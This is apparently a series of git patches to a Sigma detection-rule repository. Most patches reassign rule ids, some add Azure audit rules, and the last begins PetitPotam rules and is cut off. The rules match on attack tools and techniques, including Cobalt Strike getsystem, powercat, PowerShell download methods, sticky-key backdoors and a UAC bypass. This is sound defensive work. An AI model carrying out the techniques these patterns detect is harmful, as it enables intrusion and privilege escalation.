b/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml @@ -1,6 +1,5 @@ action: global title: Meterpreter or Cobalt Strike Getsystem Service Installation -id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation author: Teymur Kheirkhabarov, Ecco, Florian Roth date: 2019/10/26 @@ -48,6 +47,7 @@ falsepositives: - Highly unlikely level: critical --- +id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 logsource: product: windows service: system @@ -55,10 +55,12 @@ detection: selection: EventID: 7045 --- +id: d585ab5a-6a69-49a8-96e8-4a726a54de46 logsource: product: windows category: driver_load --- +id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_moriya_rootkit.yml b/rules/windows/builtin/win_moriya_rootkit.yml index 70636d9f..276d88f6 100644 --- a/rules/windows/builtin/win_moriya_rootkit.yml +++ b/rules/windows/builtin/win_moriya_rootkit.yml @@ -1,6 +1,5 @@ action: global title: Moriya Rootkit -id: 25b9c01c-350d-4b95-bed1-836d04a4f324 description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report status: experimental author: Bhabesh Raj @@ -16,6 +15,7 @@ tags: - attack.privilege_escalation - attack.t1543.003 --- +id: 25b9c01c-350d-4b95-bed1-836d04a4f324 logsource: product: windows service: system @@ -25,6 +25,7 @@ detection: ServiceName: ZzNetSvc condition: selection --- +id: a1507d71-0b60-44f6-b17c-bf53220fdd88 logsource: product: windows category: file_event From f90c7558a78d0766cf5686595609f45e2e071c09 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 21:03:25 +0200 Subject: [PATCH 0710/1367] update global id --- .../builtin/win_powershell_script_installed_as_service.yml | 4 +++- rules/windows/builtin/win_software_discovery.yml | 3 ++- .../network_connection/sysmon_regsvr32_network_activity.yml | 3 ++- rules/windows/other/win_defender_disabled.yml | 6 ++++-- rules/windows/other/win_tool_psexec.yml | 5 ++++- rules/windows/other/win_wmi_persistence.yml | 3 ++- .../sysmon_abusing_windows_telemetry_for_persistence.yml | 3 ++- rules/windows/sysmon/sysmon_pingback_backdoor.yml | 4 +++- 8 files changed, 22 insertions(+), 9 deletions(-) diff --git a/rules/windows/builtin/win_powershell_script_installed_as_service.yml b/rules/windows/builtin/win_powershell_script_installed_as_service.yml index 01652c7c..6ebf00e9 100644 --- a/rules/windows/builtin/win_powershell_script_installed_as_service.yml +++ b/rules/windows/builtin/win_powershell_script_installed_as_service.yml @@ -1,6 +1,5 @@ action: global title: PowerShell Scripts Installed as Services -id: a2e5019d-a658-4c6a-92bf-7197b54e2cae description: Detects powershell script installed as a Service status: experimental author: oscd.community, Natalia Shornikova @@ -21,6 +20,7 @@ falsepositives: - Unknown level: high --- +id: a2e5019d-a658-4c6a-92bf-7197b54e2cae logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: service_creation: EventID: 7045 --- +id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073 logsource: product: windows service: sysmon @@ -35,6 +36,7 @@ detection: service_creation: EventID: 6 --- +id: 2a926e6a-4b81-4011-8a96-e36cc8c04302 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_software_discovery.yml b/rules/windows/builtin/win_software_discovery.yml index b68643c6..39148779 100644 --- a/rules/windows/builtin/win_software_discovery.yml +++ b/rules/windows/builtin/win_software_discovery.yml @@ -1,6 +1,5 @@ action: global title: Detected Windows Software Discovery -id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. status: experimental author: Nikita Nazarov, oscd.community @@ -17,6 +16,7 @@ falsepositives: detection: condition: 1 of them --- +id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 logsource: product: windows service: powershell @@ -30,6 +30,7 @@ detection: - 'select-object' - 'format-table' --- +id: e13f668e-7f95-443d-98d2-1816a7648a7b logsource: category: process_creation product: windows diff --git a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml index 7cc461ad..fd57839c 100644 --- a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml +++ b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -1,6 +1,5 @@ action: global title: Regsvr32 Network Activity -id: c7e91a02-d771-4a6d-a700-42587e0b1095 description: Detects network connections and DNS queries initiated by Regsvr32.exe references: - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ @@ -31,10 +30,12 @@ falsepositives: - unknown level: high --- +id: c7e91a02-d771-4a6d-a700-42587e0b1095 logsource: category: network_connection product: windows --- +id: 36e037c4-c228-4866-b6a3-48eb292b9955 logsource: category: dns_query product: windows diff --git a/rules/windows/other/win_defender_disabled.yml b/rules/windows/other/win_defender_disabled.yml index 0c3281a6..4c7ec817 100644 --- a/rules/windows/other/win_defender_disabled.yml +++ b/rules/windows/other/win_defender_disabled.yml @@ -1,6 +1,5 @@ action: global title: Windows Defender Threat Detection Disabled -id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 description: Detects disabling Windows Defender threat protection date: 2020/07/28 modified: 2021/07/05 @@ -16,7 +15,8 @@ tags: falsepositives: - Administrator actions level: high ---- +--- +id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 logsource: product: windows service: windefend @@ -35,6 +35,7 @@ detection: Details: 'DWORD (0x00000001)' condition: 1 of them --- +id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 logsource: product: windows category: registry_event @@ -45,6 +46,7 @@ detection: Details: 'DWORD (0x00000001)' condition: tamper_registry --- +id: 6c0a7755-6d31-44fa-80e1-133e57752680 logsource: product: windows category: system diff --git a/rules/windows/other/win_tool_psexec.yml b/rules/windows/other/win_tool_psexec.yml index 250429d1..60f46fc5 100644 --- a/rules/windows/other/win_tool_psexec.yml +++ b/rules/windows/other/win_tool_psexec.yml @@ -1,6 +1,5 @@ action: global title: PsExec Tool Execution -id: 42c575ea-e41e-41f1-b248-8093c3e82a28 status: experimental description: Detects PsExec service installation and execution events (service and Sysmon) author: Thomas Patzke @@ -28,6 +27,7 @@ falsepositives: - unknown level: low --- +id: 42c575ea-e41e-41f1-b248-8093c3e82a28 logsource: product: windows service: system @@ -40,6 +40,7 @@ detection: EventID: 7036 ServiceName: 'PSEXESVC' --- +id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba logsource: category: process_creation product: windows @@ -50,6 +51,7 @@ detection: - 'NT AUTHORITY\SYSTEM' - 'AUTORITE NT\Sys' # French language settings --- +id: f3f3a972-f982-40ad-b63c-bca6afdfad7c logsource: category: pipe_created product: windows @@ -57,6 +59,7 @@ detection: sysmon_pipecreated: PipeName: '\PSEXESVC' --- +id: 259e5a6a-b8d2-4c38-86e2-26c5e651361d logsource: category: file_event product: windows diff --git a/rules/windows/other/win_wmi_persistence.yml b/rules/windows/other/win_wmi_persistence.yml index 6a0d02d7..38819f13 100644 --- a/rules/windows/other/win_wmi_persistence.yml +++ b/rules/windows/other/win_wmi_persistence.yml @@ -1,6 +1,5 @@ action: global title: WMI Persistence -id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b status: experimental description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community @@ -18,6 +17,7 @@ falsepositives: - Unknown (data set is too small; further testing needed) level: medium --- +id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b logsource: product: windows service: wmi #native windows detection @@ -34,6 +34,7 @@ detection: EventID: 5859 condition: (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration) --- +id: f033f3f3-fd24-4995-97d8-a3bb17550a88 logsource: product: windows service: security diff --git a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml b/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml index 58ac60c3..48ba2bf0 100644 --- a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml +++ b/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml @@ -1,6 +1,5 @@ action: global title: Abusing Windows Telemetry For Persistence -id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 status: experimental description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. references: @@ -22,6 +21,7 @@ falsepositives: - none level: high --- +id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 logsource: product: windows category: registry_event @@ -32,6 +32,7 @@ detection: Details|re: '.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.ps|.vb|.jar|.hta|.msi|.vbs)$' condition: selection --- +id: f548a603-c9f2-4c89-b511-b089f7e94549 logsource: product: windows category: process_creation diff --git a/rules/windows/sysmon/sysmon_pingback_backdoor.yml b/rules/windows/sysmon/sysmon_pingback_backdoor.yml index 085c739e..a800c432 100644 --- a/rules/windows/sysmon/sysmon_pingback_backdoor.yml +++ b/rules/windows/sysmon/sysmon_pingback_backdoor.yml @@ -1,6 +1,5 @@ action: global title: Pingback Backdoor -id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 status: experimental description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report author: Bhabesh Raj @@ -15,6 +14,7 @@ tags: - attack.persistence - attack.t1574.001 --- +id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 logsource: product: windows category: file_event @@ -24,6 +24,7 @@ detection: TargetFilename: 'C:\Windows\oci.dll' condition: selection --- +id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b logsource: product: windows category: image_load @@ -33,6 +34,7 @@ detection: ImageLoaded: 'C:\Windows\oci.dll' condition: selection --- +id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 logsource: product: windows category: process_creation From d02ee1eddd3d96937c7ccae8c533618f9f7ecb53 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 21:16:55 +0200 Subject: [PATCH 0711/1367] Update global ID --- rules/windows/builtin/win_powershell_web_request.yml | 3 ++- .../builtin/win_susp_athremotefxvgpudisablementcommand.yml | 4 +++- rules/windows/builtin/win_tap_driver_installation.yml | 4 +++- rules/windows/malware/win_mal_blue_mockingbird.yml | 4 +++- .../powershell/powershell_alternate_powershell_hosts.yml | 3 ++- rules/windows/powershell/powershell_powercat.yml | 3 ++- .../powershell/powershell_remote_powershell_session.yml | 3 ++- .../registry_event/sysmon_dns_serverlevelplugindll.yml | 3 ++- .../windows/registry_event/sysmon_stickykey_like_backdoor.yml | 3 ++- .../registry_event/sysmon_sysinternals_eula_accepted.yml | 3 ++- rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml | 3 ++- rules/windows/sysmon/sysmon_config_modification.yml | 3 ++- .../sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml | 3 ++- 13 files changed, 29 insertions(+), 13 deletions(-) diff --git a/rules/windows/builtin/win_powershell_web_request.yml b/rules/windows/builtin/win_powershell_web_request.yml index 54319f96..427d7ea9 100644 --- a/rules/windows/builtin/win_powershell_web_request.yml +++ b/rules/windows/builtin/win_powershell_web_request.yml @@ -1,6 +1,5 @@ action: global title: Windows PowerShell Web Request -id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d status: experimental description: Detects the use of various web request methods (including aliases) via Windows PowerShell command references: @@ -19,6 +18,7 @@ falsepositives: - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. level: medium --- +id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d logsource: category: process_creation product: windows @@ -32,6 +32,7 @@ detection: - 'Net.WebClient' - 'Start-BitsTransfer' --- +id: 1139d2e2-84b1-4226-b445-354492eba8ba logsource: product: windows service: powershell diff --git a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml index e4d35a7b..6fdd897e 100644 --- a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml @@ -1,6 +1,5 @@ action: global title: Abusable Invoke-ATHRemoteFXvGPUDisablementCommand -id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 status: experimental author: frack113 date: 2021/07/13 @@ -20,6 +19,7 @@ falsepositives: - Unknown level: medium --- +id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 logsource: product: windows category: process_creation @@ -34,6 +34,7 @@ detection: - '-RemoteFXvGPUDisablementFilePath' condition: selection_cmd and selection_opt --- +id: f65e22f9-819e-4f96-9c7b-498364ae7a25 logsource: product: windows service: powershell-classic @@ -49,6 +50,7 @@ detection: - '-RemoteFXvGPUDisablementFilePath' condition: selection_cmd and selection_opt --- +id: 38a7625e-b2cb-485d-b83d-aff137d859f4 logsource: product: windows service: powershell diff --git a/rules/windows/builtin/win_tap_driver_installation.yml b/rules/windows/builtin/win_tap_driver_installation.yml index a5baba35..cc3ce6e7 100644 --- a/rules/windows/builtin/win_tap_driver_installation.yml +++ b/rules/windows/builtin/win_tap_driver_installation.yml @@ -1,6 +1,5 @@ action: global title: Tap Driver Installation -id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques status: experimental author: Daniil Yugoslavskiy, Ian Davis, oscd.community @@ -16,6 +15,7 @@ detection: ImagePath|contains: 'tap0901' condition: selection --- +id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 logsource: product: windows service: system @@ -23,10 +23,12 @@ detection: selection: EventID: 7045 --- +id: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb logsource: product: windows category: driver_load --- +id: 9c8afa4d-0022-48f0-9456-3712466f9701 logsource: product: windows service: security diff --git a/rules/windows/malware/win_mal_blue_mockingbird.yml b/rules/windows/malware/win_mal_blue_mockingbird.yml index 0752d958..096c0c44 100644 --- a/rules/windows/malware/win_mal_blue_mockingbird.yml +++ b/rules/windows/malware/win_mal_blue_mockingbird.yml @@ -1,6 +1,5 @@ action: global title: Blue Mockingbird -id: c3198a27-23a0-4c2c-af19-e5328d49680e status: experimental description: Attempts to detect system changes made by Blue Mockingbird references: @@ -17,6 +16,7 @@ level: high detection: condition: 1 of them --- +id: c3198a27-23a0-4c2c-af19-e5328d49680e logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: - 'sc config' - 'wercplsupporte.dll' --- +id: ce239692-aa94-41b3-b32f-9cab259c96ea logsource: category: process_creation product: windows @@ -35,6 +36,7 @@ detection: Image|endswith: '\wmic.exe' CommandLine|endswith: 'COR_PROFILER' --- +id: 92b0b372-a939-44ed-a11b-5136cf680e27 logsource: product: windows category: registry_event diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 5078913e..58cad683 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -1,6 +1,5 @@ action: global title: Alternate PowerShell Hosts -id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 @@ -18,6 +17,7 @@ falsepositives: - Citrix ConfigSync.ps1 level: medium --- +id: 64e8e417-c19a-475a-8d19-98ea705394cc logsource: product: windows service: powershell @@ -30,6 +30,7 @@ detection: ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event condition: selection and not filter --- +id: d7326048-328b-4d5e-98af-86e84b17c765 logsource: product: windows service: powershell-classic diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index c4c5cb0c..bf10582d 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -1,6 +1,5 @@ action: global title: Netcat The Powershell Version -id: c5b20776-639a-49bf-94c7-84f912b91c15 status: experimental author: frack113 date: 2021/07/21 @@ -16,6 +15,7 @@ falsepositives: - Unknown level: medium --- +id: c5b20776-639a-49bf-94c7-84f912b91c15 logsource: product: windows service: powershell-classic @@ -28,6 +28,7 @@ detection: - 'powercat.ps1' condition: selection --- +id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 logsource: product: windows service: powershell diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 652741eb..429a623b 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -1,6 +1,5 @@ action: global title: Remote PowerShell Session -id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions status: test date: 2019/08/10 @@ -19,6 +18,7 @@ falsepositives: - Legitimate use remote PowerShell sessions level: high --- +id: 96b9f619-aa91-478f-bacb-c3e50f8df575 logsource: product: windows service: powershell @@ -31,6 +31,7 @@ detection: - 'wsmprovhost.exe' # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = condition: selection --- +id: 60167e5c-84b2-4c95-a7ac-86281f27c445 logsource: product: windows service: powershell-classic diff --git a/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml b/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml index fd7d5d2c..a40600b8 100755 --- a/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml +++ b/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml @@ -1,6 +1,5 @@ action: global title: DNS ServerLevelPluginDll Install -id: e61e8a88-59a9-451c-874e-70fcc9740d67 status: experimental description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required) @@ -25,6 +24,7 @@ falsepositives: - unknown level: high --- +id: e61e8a88-59a9-451c-874e-70fcc9740d67 logsource: product: windows category: registry_event @@ -33,6 +33,7 @@ detection: TargetObject|endswith: '\services\DNS\Parameters\ServerLevelPluginDll' condition: 1 of them --- +id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 logsource: category: process_creation product: windows diff --git a/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml b/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml index 7f23a329..eeaeb2cf 100755 --- a/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml +++ b/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml @@ -1,6 +1,5 @@ action: global title: Sticky Key Like Backdoor Usage -id: baca5663-583c-45f9-b5dc-ea96a22ce542 description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: @@ -19,6 +18,7 @@ falsepositives: - Unlikely level: critical --- +id: baca5663-583c-45f9-b5dc-ea96a22ce542 logsource: category: registry_event product: windows @@ -33,6 +33,7 @@ detection: - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger' condition: 1 of them --- +id: 2fdefcb3-dbda-401e-ae23-f0db027628bc logsource: category: process_creation product: windows diff --git a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml b/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml index 717e6b93..b4d8825b 100755 --- a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml +++ b/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml @@ -1,6 +1,5 @@ action: global title: Usage of Sysinternals Tools -id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 status: experimental description: Detects the usage of Sysinternals Tools due to accepteula key being added to Registry references: @@ -12,6 +11,7 @@ falsepositives: - Programs that use the same Registry Key level: low --- +id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 logsource: product: windows category: registry_event @@ -20,6 +20,7 @@ detection: TargetObject|endswith: '\EulaAccepted' condition: 1 of them --- +id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b logsource: category: process_creation product: windows diff --git a/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml b/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml index 065779e1..ed8f6054 100755 --- a/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml @@ -1,6 +1,5 @@ action: global title: UAC Bypass via Event Viewer -id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 status: experimental description: Detects UAC bypass method using Windows event viewer references: @@ -19,6 +18,7 @@ falsepositives: - unknown level: critical --- +id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 logsource: product: windows category: registry_event @@ -28,6 +28,7 @@ detection: TargetObject|endswith: '\mscfile\shell\open\command' condition: methregistry --- +id: be344333-921d-4c4d-8bb8-e584cf584780 logsource: category: process_creation product: windows diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index 38367005..6ca045a7 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -1,6 +1,5 @@ action: global title: Sysmon Configuration Modification -id: 1f2b5353-573f-4880-8e33-7d04dcf97744 description: Someone try to hide from Sysmon status: experimental author: frack113 @@ -16,6 +15,7 @@ falsepositives: - legitimate administrative action level: high --- +id: 1f2b5353-573f-4880-8e33-7d04dcf97744 logsource: product: windows category: sysmon_status @@ -26,6 +26,7 @@ detection: - 'Sysmon config state changed' condition: selection_stop or selection_conf --- +id: 815cd91b-7dbc-4247-841a-d7dd1392b0a8 logsource: product: windows category: sysmon_error diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml index eea60e94..76de527b 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,6 +1,5 @@ action: global title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum -id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef status: experimental description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum author: Sittikorn S @@ -20,6 +19,7 @@ falsepositives: - Unlikely level: critical --- +id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef logsource: product: windows category: file_event @@ -38,6 +38,7 @@ detection: - 'C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini' condition: selection --- +id: 32b5db62-cb5f-4266-9639-0fa48376ac00 logsource: product: windows category: registry_event From 1272c76ae7774430412a4adb7dbacbf1779ff92c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 20:31:27 -0500 Subject: [PATCH 0712/1367] Create azure_network_firewall_policy_modified_or_deleted.yml --- ...rk_firewall_policy_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml b/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml new file mode 100644 index 00000000..b087d550 --- /dev/null +++ b/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Network Firewall Policy Modified or Deleted +id: 83c17918-746e-4bd9-920b-8e098bf88c23 +description: Identifies when a Firewall Policy is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/02 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION + - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION + - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d25fd420d60b07c7a94d41979a54237eb825a697 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 20:48:35 -0500 Subject: [PATCH 0713/1367] Create azure_service_principal_created.yml --- .../azure/azure_service_principal_created.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_service_principal_created.yml diff --git a/rules/cloud/azure/azure_service_principal_created.yml b/rules/cloud/azure/azure_service_principal_created.yml new file mode 100644 index 00000000..6eabb075 --- /dev/null +++ b/rules/cloud/azure/azure_service_principal_created.yml @@ -0,0 +1,21 @@ +title: Azure Service Principal Created +id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 +description: Identifies when a service principal is created in Azure. +author: Austin Songer +status: experimental +date: 2021/09/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: "Add service principal" + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Service principal being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 10af7bbdb1e10d08b786498d33ba2194113c5adc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 20:53:32 -0500 Subject: [PATCH 0714/1367] Create azure_app_credential_modification.yml --- .../azure_app_credential_modification.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_app_credential_modification.yml diff --git a/rules/cloud/azure/azure_app_credential_modification.yml b/rules/cloud/azure/azure_app_credential_modification.yml new file mode 100644 index 00000000..dec50c51 --- /dev/null +++ b/rules/cloud/azure/azure_app_credential_modification.yml @@ -0,0 +1,21 @@ +title: Azure Application Credential Modified +id: cdeef967-f9a1-4375-90ee-6978c5f23974 +description: Identifies when a application credential is modified. +author: Austin Songer +status: experimental +date: 2021/09/02 +references: + - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/ +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: "Update application - Certificates and secrets management" + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application credential added may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 643ec0abe3ced1facc09d7d5838ac758802386aa Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 21:00:02 -0500 Subject: [PATCH 0715/1367] Update azure_service_principal_created.yml --- rules/cloud/azure/azure_service_principal_created.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_service_principal_created.yml b/rules/cloud/azure/azure_service_principal_created.yml index 6eabb075..82e422ca 100644 --- a/rules/cloud/azure/azure_service_principal_created.yml +++ b/rules/cloud/azure/azure_service_principal_created.yml @@ -1,7 +1,7 @@ title: Azure Service Principal Created id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 description: Identifies when a service principal is created in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/02 references: From 775c0e8e7f19b2248d22e3497055dc639d08b5eb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 21:00:21 -0500 Subject: [PATCH 0716/1367] Update azure_app_credential_modification.yml --- rules/cloud/azure/azure_app_credential_modification.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_app_credential_modification.yml b/rules/cloud/azure/azure_app_credential_modification.yml index dec50c51..1a95a62c 100644 --- a/rules/cloud/azure/azure_app_credential_modification.yml +++ b/rules/cloud/azure/azure_app_credential_modification.yml @@ -1,7 +1,7 @@ title: Azure Application Credential Modified id: cdeef967-f9a1-4375-90ee-6978c5f23974 description: Identifies when a application credential is modified. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/02 references: From ba41e922d29e38990ffc43a2a85ed875dda21bb0 Mon Sep 17 00:00:00 2001 From: mvelazco Date: Fri, 3 Sep 2021 00:12:49 -0400 Subject: [PATCH 0717/1367] adding Petitpotam host detections --- .../builtin/win_petitpotam_network_share.yml | 25 ++++++++++++++ .../win_petitpotam_susp_tgt_request.yml | 34 +++++++++++++++++++ 2 files changed, 59 insertions(+) create mode 100644 rules/windows/builtin/win_petitpotam_network_share.yml create mode 100644 rules/windows/builtin/win_petitpotam_susp_tgt_request.yml diff --git a/rules/windows/builtin/win_petitpotam_network_share.yml b/rules/windows/builtin/win_petitpotam_network_share.yml new file mode 100644 index 00000000..15ee76da --- /dev/null +++ b/rules/windows/builtin/win_petitpotam_network_share.yml @@ -0,0 +1,25 @@ +title: Possible PetitPotam Coerce Authentication Attempt +id: 1ce8c8a3-2723-48ed-8246-906ac91061a6 +description: Detect PetitPotam coerced authentication activity. +author: Mauricio Velazco, Michael Haag +date: 2021/09/02 +references: + - https://github.com/topotam/PetitPotam + - https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml 